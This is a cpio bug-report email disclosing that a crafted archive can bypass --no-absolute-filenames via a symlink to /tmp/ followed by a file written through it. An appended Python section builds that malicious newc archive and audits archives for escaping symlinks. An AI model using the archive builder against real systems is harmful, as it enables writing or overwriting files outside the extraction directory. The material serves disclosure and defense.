From: Cedric Buissart
Subject: [Bug-cpio] [PATCH] symlink target sanity check to prevent --no-absolute-filenames bypass
Date: Mon, 5 Jun 2017 17:34:58 +0200

Hi,

Looking at cpio, I found what seems to be a way to bypass the --no-absolute-filenames option, which supposedly prevents data from being written outside of the current folder.

One just needs to create a cpio archive that contains a symlink to the required destination, then a file that appears to be from inside the symlink (this requires a specially crafted cpio archive):

1) there is no file called /tmp/blah
address@hidden testings]$ ll
total 4
-rw-rw-r--. 1 cedric cedric 384 Jun  4 22:34 link.cpio
address@hidden testings]$ ll /tmp/blah
ls: cannot access '/tmp/blah': No such file or directory

2) I extract the specially crafted cpio
address@hidden testings]$ cpio -idv --no-absolute-filenames < link.cpio
link
link/blah
1 block

3) there is a file /tmp/blah
address@hidden testings]$ ll
total 4
lrwxrwxrwx. 1 cedric cedric   5 Jun  4 22:21 link -> /tmp/
-rw-rw-r--. 1 cedric cedric 384 Jun  4 22:15 link.cpio
address@hidden testings]$ ll /tmp/blah
-rw-rw-r--. 1 cedric cedric 3 Jun  4 22:21 /tmp/blah

The very naive patch attached makes use of safer_name_suffix() to sanitize the symlink's value.

Thanks!

--
Cedric Buissart,
Product Security

Attachment: symlink-safer_name_suffix.patch
Description: Text Data
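The crafted archive described in the report, reconstructed as an added example (this is not code from the original post, nor from the cpio project, and it does not reproduce the attached patch). It builds a minimal newc-format cpio archive in memory containing a symlink `link -> /tmp/` followed by a regular file `link/blah`, exactly the entry sequence a stock `cpio -o` would never emit, and then runs an audit over the archive that flags the two things `--no-absolute-filenames` does not look at on its own: a symlink whose target escapes the extraction root, and an entry whose path passes through a component an earlier entry declared as a symlink. All function names, the sample payload, and the uid/gid values are assumptions chosen for the example.

```python
import os
import stat

NEWC_MAGIC = b"070701"   # SVR4 "newc" cpio, the format `cpio -H newc` writes


def _pad4(n):
    """Bytes needed to bring n up to the next multiple of 4 (newc alignment)."""
    return (4 - n % 4) % 4


def _entry(name, mode, data=b""):
    """One newc entry: 110-byte ASCII-hex header, NUL-terminated name, data, 4-byte padding."""
    name_b = name.encode() + b"\0"
    fields = [
        0,            # ino
        mode,         # mode: file-type bits plus permissions
        1000, 1000,   # uid, gid (assumed values for the example)
        1,            # nlink
        0,            # mtime
        len(data),    # filesize; for a symlink this is the length of the target path
        0, 0, 0, 0,   # devmajor, devminor, rdevmajor, rdevminor
        len(name_b),  # namesize, including the trailing NUL
        0,            # check (unused in newc)
    ]
    header = NEWC_MAGIC + b"".join(b"%08X" % f for f in fields)
    out = header + name_b + b"\0" * _pad4(len(header) + len(name_b))
    return out + data + b"\0" * _pad4(len(data))


def build_symlink_bypass_archive(target_dir="/tmp/", link="link", inner="blah", payload=b"hi\n"):
    """Constructed sample archive reproducing the report: a symlink to target_dir,
    then a regular file that claims to live *inside* that symlink."""
    blob = _entry(link, stat.S_IFLNK | 0o777, target_dir.encode())
    blob += _entry(f"{link}/{inner}", stat.S_IFREG | 0o664, payload)
    blob += _entry("TRAILER!!!", 0)
    return blob


def parse_newc(blob):
    """Yield (name, mode, data) for every entry up to the trailer."""
    off = 0
    while True:
        if blob[off:off + 6] != NEWC_MAGIC:
            raise ValueError(f"bad newc magic at offset {off}")
        f = [int(blob[off + 6 + 8 * i:off + 14 + 8 * i], 16) for i in range(13)]
        mode, filesize, namesize = f[1], f[6], f[11]
        name_start = off + 110
        name = blob[name_start:name_start + namesize - 1].decode()
        data_start = name_start + namesize + _pad4(110 + namesize)
        data = blob[data_start:data_start + filesize]
        off = data_start + filesize + _pad4(filesize)
        if name == "TRAILER!!!":
            return
        yield name, mode, data


def _escapes_root(path):
    """True if a root-relative, normalized path points outside the extraction root."""
    return path.startswith("/") or path == ".." or path.startswith("../")


def audit_archive(blob):
    """Return a list of (entry_name, reason) findings for an in-memory newc archive.

    Checks, in archive order (order matters: the symlink must precede the file for the
    bypass to work, and a checker that only looks at names in isolation misses it):
      1. entry names that are absolute or climb above the root
      2. symlink targets that resolve outside the root (absolute, or '..' past the top)
      3. entries whose path walks through a component that an earlier entry made a symlink
    """
    findings = []
    symlinks = set()   # normalized paths of symlink entries seen so far
    for name, mode, data in parse_newc(blob):
        norm = os.path.normpath(name)
        if _escapes_root(norm):
            findings.append((name, "absolute or escaping entry name"))
        if stat.S_ISLNK(mode):
            target = data.decode()
            # Resolve the target relative to the directory the link itself lives in.
            resolved = os.path.normpath(os.path.join(os.path.dirname(norm), target))
            if _escapes_root(resolved):
                findings.append((name, f"symlink target escapes extraction root: {target!r}"))
            symlinks.add(norm)
        parts = norm.split("/")
        for i in range(1, len(parts)):          # every proper prefix of the path
            if "/".join(parts[:i]) in symlinks:
                findings.append((name, f"path traverses earlier symlink {'/'.join(parts[:i])!r}"))
                break
    return findings


if __name__ == "__main__":
    for entry, reason in audit_archive(build_symlink_bypass_archive()):
        print(f"{entry}: {reason}")
```

The second and third checks are the ones that matter here: the entry name `link/blah` is perfectly relative, so a name-only filter such as `--no-absolute-filenames` accepts it, and the damage is done by the `link` entry that was already placed on disk. Rejecting symlink targets that resolve outside the root (or refusing to write through an already-extracted symlink) closes the gap for absolute targets; a symlink to a relative directory inside the tree is still legitimate, which is why the audit resolves the target relative to the link's own directory rather than rejecting every symlink.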

